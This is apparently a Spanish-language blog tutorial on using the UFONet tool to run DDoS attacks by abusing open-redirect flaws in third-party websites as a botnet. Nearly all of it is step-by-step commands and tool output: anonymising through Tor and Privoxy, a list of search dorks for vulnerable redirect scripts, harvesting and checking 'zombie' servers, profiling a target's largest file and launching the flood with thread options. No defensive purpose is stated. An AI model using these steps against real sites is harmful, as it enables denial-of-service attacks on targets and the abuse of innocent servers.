UFONet es una herramienta de código abierto con licencia GPLv3, escrita por Lord Epsylon (psy) en python, html5 y javascript, para realizar ataques de denegación distribuídos (DDoS) aprovechando fallos de redirecciones abiertas (open redirect) en aplicaciones web de terceros, a modo de botnet.
Una vulnerabilidad Open Redirect es una vulnerabilidad que permite al atacante realizar una redirección arbitraria, debido fundamentalmente a que el aplicativo web delega la redirección en una variable controlada por el usuario. UFONet es capaz de buscar en Google y recopilar una buena lista de aplicaciones web vulnerables a Open Redirect ("zombies") para luego utilizarlas cuando se quiera atacar a un objetivo redireccionando el tráfico de forma masiva mediante estas redirecciones.
La herramienta funciona en Linux, Windows, OSX..., en cualquier sistema con Python (~2.7.x) y python-pycurl:
apt-get install python-pycurl
En esta entrada vamos a hacer una serie de pruebas bajo Kali Linux con la release v0.5b - Invasion! que se publicó hace menos de una semana y que adicionalmente permite multithreading, corrige bugs y añade estadísticas generales y de bots.
Primero clonanos el repositorio de GitHub:
git clone https://github.com/epsylon/ufonet
Antes de empezar, suele ser recomendable mantener cierto grado de anonimato mediante Tor:
python ufonet --check-tor
=================================================================
888 888 8888888888 .d88888b. 888b 888 888
888 888 888 d88P Y888b 8888b 888 888
888 888 888 888 888 88888b 888 888
888 888 8888888 888 888 888Y88b 888 .d88b. 888888
888 888 888 888 888 888 Y88b888 d8P Y8b 888
888 888 888 888 888 888 Y88888 88888888 888
Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b.
'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888
UFONet - DDoS attacks via Web Abuse - by psy
=================================================================
Sending request to: https://check.torproject.org
It seems that Tor is not properly set.
Your IP address appears to be: X.X.X.12
¡Ups! Hay que remediarlo:
apt-get install vidalia privoxy
service tor start
echo "forward-socks5 / 127.0.0.1:9050 ." >> /etc/privoxy/config
service privoxy start
root@kali:~# curl --socks5 127.0.0.1:9050 curlmyip.com
89.31.X.5
root@kali:~/ufonet/ufonet# curl -x 127.0.0.1:8118 curlmyip.com
185.X.37.158
Una vez que tenemos cubiertas las espaldas, empezaremos a buscar en Internet servidores web vulnerables a Open Redirect. Podemos indicar un fichero donde tenemos todos los dorks:
root@kali:~/ufonet/ufonet# cat dorks.txt
proxy.php?url=
check.cgi?url=
checklink?uri=
validator?uri=
horde/util/go.php?url=
mobiquo/mobiquo.php?referer=
wp-content/themes/dt-chocolate/like_window.php?image=
wp-content/plugins/age-verification/age-verification.php?redirect_to=
gotoURL.asp?url=
root@kali:~/ufonet/ufonet# ./ufonet -v --sd=dorks.txt --proxy="http://127.0.0.1:8118"
O especificar uno como parámetro:
root@kali:~/ufonet/ufonet# ./ufonet -v -s 'proxy.php?url=' --proxy="http://127.0.0.1:8118"
Searching for 'zombies' on google results. Good Luck ;-)
======================
Query used: https://www.google.com/xhtml?q=inurl%3A%22proxy.php%3Furl%3D%22&start=0&num=10&gws_rd=ssl
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
+Victim found: http://servidor/blog/wp-content/plugins/google-document-embedder/proxy.php?url=
------------
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
+Victim found: http://servidor/CPnets/proxy.php?url=
------------
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
+Victim found: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
------------
======================
Bien! parece que hemos encontrado en Google los primeros candidatos a convertirse en nuestros particulares zombies. Pero tenemos que comprobar si realmente están "vivos" (ironía++) y son realmente vulnerables:
Wanna check if they are valid zombies? (Y/n)
Y
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 6
---------------------
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
[Control] Active zombies: 6 , waiting for them to return...
Reply:
...
=========================================
[Control] All zombies returned to the master ;-)
---------------------
Zombie: www.victima.com
Status: Ok [200]
----------
...
==================
OK: 5 Fail: 1
==================
======================
Checking for payloads:
======================
Trying: 5
---------------------
Reply:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
No está nada mal, 5 de 6! Pues hay que "alistarlos" e incorporarlos a nuestro ejército de bots:
[Control] All zombies returned to the master ;-)
---------------------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Not ready...
----------
Vector: http://servidor/CPnets/proxy.php?url=
Status: Waiting your orders...
----------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Waiting your orders...
----------
Vector: http://servidor/cms/sites/all/modules/ckeditor_link/proxy.php?url=
Status: Not ready...
----------
Vector: http://servidor/blog/wp-content/plugins/google-document-embedder/proxy.php?url=
Status: Not ready...
----------
==================
OK: 2 Fail: 3
==================
==================
Army of 'zombies'
==================
Zombie [ 1 ]: servidor1
Zombie [ 2 ]: servidor2
------------------
Total Army: 2
------------------
Wanna update your army (Y/n)Y
-------------------------
[INFO] - Botnet updated! ;-)
Ahora llega el momento de seleccionar un objetivo para realizar el ataque DDoS. Primero inspeccionaremos la URL de la víctima (crawling) para ver cual es el objeto de mayor tamaño y poder realizar un ataque más efectivo:
root@kali:~/ufonet/ufonet# ./ufonet -v -i http://target.com --proxy="http://127.0.0.1:8118"
...
Inspecting target's component sizes to search for better places to 'bit'... Grrr!
======================
+Style (.css) found: css/ie.css
(Size: 2607 Bytes)
------------
================================================================
================================================================
Y finalmente, lanzamos el ataque con los parámetros correspondientes:
+ con verbose: ./ufonet -a http://target.com -r 10 -v
+ con proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
+ especificando url: ./ufonet -a http://target.com -r 10 -b "/css/ie.css"
+ cpn threads: ./ufonet -a http://target.com -r 10 --threads 50
...
Total invocations: 30 | Zombies: 3 | Hits: 30 | Fails: 0
Total time: 0:00:33.577397 | Avg time: 0:00:01.119247
Total size: 147.8KiB | Avg size: 4.9KiB
=====================
[INFO] - Attack completed! ;-)
=====================
Fuente: http://ufonet.sourceforge.net/